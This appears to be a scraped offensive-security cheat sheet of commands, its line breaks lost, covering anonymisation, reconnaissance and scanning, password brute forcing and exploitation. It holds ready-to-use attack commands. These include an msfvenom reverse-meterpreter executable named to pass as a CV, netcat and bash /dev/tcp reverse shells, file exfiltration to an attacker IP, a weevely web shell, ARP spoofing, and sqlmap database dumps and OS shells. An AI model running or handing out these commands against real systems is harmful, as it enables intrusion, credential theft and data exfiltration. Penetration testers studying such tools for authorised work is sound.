Change MAC Address
ip link set dev eth0 down
macchanger -m 12:23:34:45:56:67 eth0
ip link set dev eth0 upStatic ip configuration
ip addr add 10.5.23.56/24 dev eth0Proxychains with Tor
systemctl start torstop: Used to stop tor servicesrestart: Used to restart tor services
proxychains curl http://ifconfig.me/ipUse proxychains before running any cmd
whois to query WHOIS servers
whois <target>nslookup to query DNS servers
nslookup <target>
nslookup -type=A <target> 1.1.1.1dig to query DNS servers
dig <target>
dig @1.1.1.1 <target> TXTOnline:
Web Browser:
- Chrome DevTools
- FoxyProxy (change the proxy server)
- User-Agent Switcher and Manager (pretend to different OS/browser)
- Wappalyzer (technologies used)
Test connection and DNS information
ping <target>
traceroute/tracert <target>Communicate with host
telnet <target> <port>
GET / HTTP/1.1
host: telnetnc <target> <port>
GET / HTTP/1.1
host: netcatFinds subdomains of a web server
nmap -sn -Pn --script=hostmap-crtsh <target>combine various sources for subdomain enum
amass enum -src -brute -min-for-recursive 2 -d <target>enumerating information
# enumerate username
enum4linux -u <target>
# enumerate all
enum4linux -a <target>nmap -A -T4 <target>
nmap -sS -sV -sC -T4 <target>
nmap -sS -sV -Pn <target>-A: Enable OS detection, version detection, script scanning, and traceroute-sS: TCP SYN Stealth scan-sV: Probe open ports to determine service/version info-O: Enable OS detection-p <port ranges>: Only scan specified ports-sC: scan with default scripts-Pn: Treat all hosts as online--script=vuln: detect vulnerability script on target--script=http-enum: numeration web scan
masscan -p80,8000-8100 --rate 20000 10.0.0.0/8rustscan -a <ip>gobuster dir -u <url> -w /usr/share/wordlists/dirb/common.txt -t 30dir: (scan for directories)-u: Target URL-w: the wordlist we are using to scan
dirb <url>gospider -o output -c 10 -d 1 -t 30 -s "<url>"ffuf -mc all -ac -u https://target/FUZZ -w /usr/share/wordlists/dirb/common.txtwfuzz -c -z file,/usr/share/wordlists/dirb/big.txt http://example.com/FUZZ/note.txt
wfuzz -c -z file,wordlist.txt -d "username=FUZZ&password=FUZZ" -u http://example.com/login.php
wfuzz -d -c -z file,big.txt http://example.com/login.php?id=FUZZ-c: Shows the output in color-z file,<wordlist>: Specifies what will replace FUZZ in the request--hc/hl/hw/hh: Hide responses with the specified code/lines/words/chars-d postdata: Use to post data (ex: "id=FUZZ&catalogue=1")
arjun -u https://api.example.com/endpointnikto -host <target>searchsploit <keyword>-m: mirror download the exploit-u: show url to its CVE
requests lib error for python2
git clone https://github.com/kennethreitz/requests
cd requests && python setup.py
pip3 install --force-reinstall requests
pip3 install --ignore-installed requestsmsfconsole# Reverse malware
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe -o cv-username.exe
# listener
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 'listening port'; exploit"python3 -m http.server
wget <your_ip>:8000/rev.shNote: In real-world environment, you would want to use a common port such as nc -vlnp 443 that is not filtered by firewalls in most scenarios
connect
# attacker before
nc -lvnp 4444
# client after
nc <rhost> 4444-l: Listen-v: Verbose-n: Do not use DNS-p: What port to listen on
bind shell
# client before
nc -lvnp 4444 -e "/bin/bash -i"
# attacker after
nc <rhost> 4444reverse shell
# attacker before
nc -lvnp 4444
# client after
nc <rhost> 4444 -e "/bin/bash -i"transfer file
# attacker receive
nc -lvnp 4444 > file
# client send
nc <rhost> 4444 < filessh crack
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://<ip> -V -f-l: username-L: userlist file-p: password-P: wordlist file-V: verbose mode-f: exit when found one-s: specified port
crack web credential
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -Vhttp-post-form: attacks type (POST)<login url>: url to login page^USER^: username placed when bruteforce^PASS^: password placed when bruteforce
# reverse shell
bash -i >& /dev/tcp/<your_ip>/4444 0>&1
# file upload
bash -c 'cat $LFILE > /dev/tcp/<your_ip>/4444'
# file download
bash -c 'cat < /dev/tcp/<your_ip>/4444 > file.txt'Weaponized web shell with password
weevely generate s3cr3t shell.php
weevely http://192.168.1.202/shell.php s3cr3tBruteforce SSH password
ncrack -p22 --user root -P /usr/share/wordlists/rockyou.txt <target>ARP spoofing
arpspoof -t 10.10.10.24 10.10.10.25ARP cache
# show cache
ip neigh
# delete cache
ip neigh flush all
Easy Scanning option
sqlmap -u "http://example.com/login.php"List all databases at the site
sqlmap -u "http://example.com/login.php" --dbsList all tables in a specific database
sqlmap -u "http://example.com/login.php" -D db_name --tablesDump the contents of a DB table
sqlmap -u "http://example.com/login.php" -D db_name -T table_name –dumpList all columns in a table
sqlmap -u "http://example.com/login.php" -D db_name -T table_name --columnsDump only selected columns
sqlmap -u "http://example.com/login.php" -D db_name -T users -C username,password --dumpDump a table from a database when you have admin credentials
sqlmap -u "http://example.com/login.php" –method "POST" –data "username=admin&password=admin&submit=Submit" -D db_name -T table_name –dumpGet OS Shell
sqlmap --dbms=mysql -u "http://example.com/login.php" --os-shellGet SQL Shell
sqlmap --dbms=mysql -u "http://example.com/login.php" --sql-shell